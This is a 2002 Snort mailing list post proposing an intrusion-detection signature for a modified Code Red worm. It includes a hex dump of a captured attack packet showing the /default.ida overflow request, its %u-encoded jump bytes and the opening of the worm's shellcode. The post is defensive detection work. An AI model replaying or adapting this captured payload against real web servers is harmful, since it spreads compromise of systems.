[Snort-sigs] New Code Red v3 signature

Robert Wagner rwagner at ...447...
Mon Apr 8 08:46:24 EDT 2002


Feel free to pick a better name. It appears that the original worm has been
modified.  Let me know if you find a better signature.
This is a little bit bulky, but it may help you identify this worm:

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS 80 (msg:"WEB-IIS CodeRed v3
root.exe access"; flags: A+; uricontent:"|4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E
4E 4E 4E 4E 4E 4E 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 C3 03 00 00
00 78 00 FA 20 25 75 39 30 39 30 25 75 36 38 35 38 25 75 63 62 64 33 25 75
37 38 30 31 25 75 39 30 39 30 25 75 36 38 35 38 25 75 63 62 64 33 25 75 37
38 30 31 25 75 39 30 39 30 25 75 39 30 39 30 25 75 38 31 39 30 25 75 30 30
63|"; tag: host, 300, packets, src; nocase;
classtype:web-application-attack; sid: 1256; rev:2;)

This should pick up this part of the attack:
0x03E0: 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  NNNNNNNNNNNNNNNN
0x03F0: 4E 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  N...............
0x0400: C3 03 00 00 00 78 00 FA 20 25 75 39 30 39 30 25  .....x.. %u9090%
0x0410: 75 36 38 35 38 25 75 63 62 64 33 25 75 37 38 30  u6858%ucbd3%u780
0x0420: 31 25 75 39 30 39 30 25 75 36 38 35 38 25 75 63  1%u9090%u6858%uc
0x0430: 62 64 33 25 75 37 38 30 31 25 75 39 30 39 30 25  bd3%u7801%u9090%
0x0440: 75 39 30 39 30 25 75 38 31 39 30 25 75 30 30 63  u9090%u8190%u00c


----------------------------------------------------------------------------
----------------------------------------------------------------------
Here is the whole packet:
0x0000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x0010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x0020: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x0030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x0040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x0050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x0060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x0070: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x0080: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x0090: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x00A0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x00B0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x00C0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x00D0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x00E0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x00F0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x0100: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x0110: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x0120: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x0130: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x0140: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x0150: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x0160: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x0170: 06 50 00 50 72 BB 3C CB D9 98 3E DF 50 18 44 70  .P.Pr.<...>.P.Dp
0x0180: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x0190: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x01A0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x01B0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x01C0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x01D0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x01E0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x01F0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x0200: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x0210: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x0220: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x0230: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x0240: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x0250: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x0260: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x0270: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x0280: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x0290: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x02A0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x02B0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x02C0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x02D0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x02E0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x02F0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x0300: 47 45 54 20 2F 64 65 66 61 75 6C 74 2E 69 64 61  GET /default.ida
0x0310: 3F 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  ?NNNNNNNNNNNNNNN
0x0320: 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  NNNNNNNNNNNNNNNN
0x0330: 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  NNNNNNNNNNNNNNNN
0x0340: 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  NNNNNNNNNNNNNNNN
0x0350: 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  NNNNNNNNNNNNNNNN
0x0360: 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  NNNNNNNNNNNNNNNN
0x0370: 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  NNNNNNNNNNNNNNNN
0x0380: 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  NNNNNNNNNNNNNNNN
0x0390: 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  NNNNNNNNNNNNNNNN
0x03A0: 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  NNNNNNNNNNNNNNNN
0x03B0: 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  NNNNNNNNNNNNNNNN
0x03C0: 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  NNNNNNNNNNNNNNNN
0x03D0: 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  NNNNNNNNNNNNNNNN
0x03E0: 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  NNNNNNNNNNNNNNNN
0x03F0: 4E 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  N...............
0x0400: C3 03 00 00 00 78 00 FA 20 25 75 39 30 39 30 25  .....x.. %u9090%
0x0410: 75 36 38 35 38 25 75 63 62 64 33 25 75 37 38 30  u6858%ucbd3%u780
0x0420: 31 25 75 39 30 39 30 25 75 36 38 35 38 25 75 63  1%u9090%u6858%uc
0x0430: 62 64 33 25 75 37 38 30 31 25 75 39 30 39 30 25  bd3%u7801%u9090%
0x0440: 75 39 30 39 30 25 75 38 31 39 30 25 75 30 30 63  u9090%u8190%u00c
0x0450: 33 25 75 30 30 30 33 25 75 38 62 30 30 25 75 35  3%u0003%u8b00%u5
0x0460: 33 31 62 25 75 35 33 66 66 25 75 30 30 37 38 25  31b%u53ff%u0078%
0x0470: 75 30 30 30 30 25 75 30 30 3D 61 20 20 48 54 54  u0000%u00=a  HTT
0x0480: 50 2F 31 2E 30 0D 0A 43 6F 6E 74 65 6E 74 2D 74  P/1.0..Content-t
0x0490: 79 70 65 3A 20 74 65 78 74 2F 78 6D 6C 0A 48 4F  ype: text/xml.HO
0x04A0: 53 54 3A 77 77 77 2E 77 6F 72 6D 2E 63 6F 6D 0A  ST:www.worm.com.
0x04B0: 20 41 63 63 65 70 74 3A 20 2A 2F 2A 0A 43 6F 6E   Accept: */*.Con
0x04C0: 74 65 6E 74 2D 6C 65 6E 67 74 68 3A 20 33 35 36  tent-length: 356
0x04D0: 39 20 0D 0A 0D 0A 55 8B EC 81 EC 18 02 00 00 53  9 ....U........S
0x04E0: 56 57 8D BD E8 FD FF FF B9 86 00 00 00 B8 CC CC  VW..............
0x04F0: CC CC F3 AB C7 85 70 FE FF FF 00 00 00 00 E9 0A  ......p.........
0x0500: 0B 00 00 8F 85 68 FE FF FF 8D BD F0 FE FF FF 64  .....h.........d
0x0510: A1 00 00 00 00 89 47 08 64 89 3D 00 00 00 00 E9  ......G.d.=.....
0x0520: 6F 0A 00 00 8F 85 60 FE FF FF C7 85 F0 FE FF FF  o.....`.........
0x0530: FF FF FF FF 8B 85 68 FE FF FF 83 E8 07 89 85 F4  ......h.........
0x0540: FE FF FF C7 85 58 FE FF FF 00 00 E0 77 E8 9B 0A  .....X......w...
0x0550: 00 00 83 BD 70 FE FF FF 00 0F 85 DD 01 00 00 8B  ....p...........
0x0560: 8D 58 FE FF FF 81 C1 00 00 01 00 89 8D 58 FE FF  .X...........X..
0x0570: FF 81 BD 58 FE FF FF 00 00 00 78 75 0A C7 85 58  ...X......xu...X
0x0580: FE FF FF 00 00 F0 BF 8B 95 58 FE FF FF 33 C0 66  .........X...3.f
0x0590: 8B 02 3D 4D 5A 00 00 0F 85 9A 01 00 00 8B 8D 58  ..=MZ..........X
0x05A0: FE FF FF 8B 51 3C 8B 85 58 FE FF FF 33 C9 66 8B  ....Q<..X...3.f.
0x05B0: 0C 10 81 F9 50 45 00 00 0F 85 79 01 00 00 8B 95  ....PE....y.....
0x05C0: 58 FE FF FF 8B 42 3C 8B 8D 58 FE FF FF 8B 54 01  X....B<..X....T.
0x05D0: 78 03 95 58 FE FF FF 89 95 54 FE FF FF 8B 85 54  x..X.....T.....T
0x05E0: FE FF FF 8B 48 0C 03 8D 58 FE FF FF 89 8D        ....H...X.....




More information about the Snort-sigs mailing list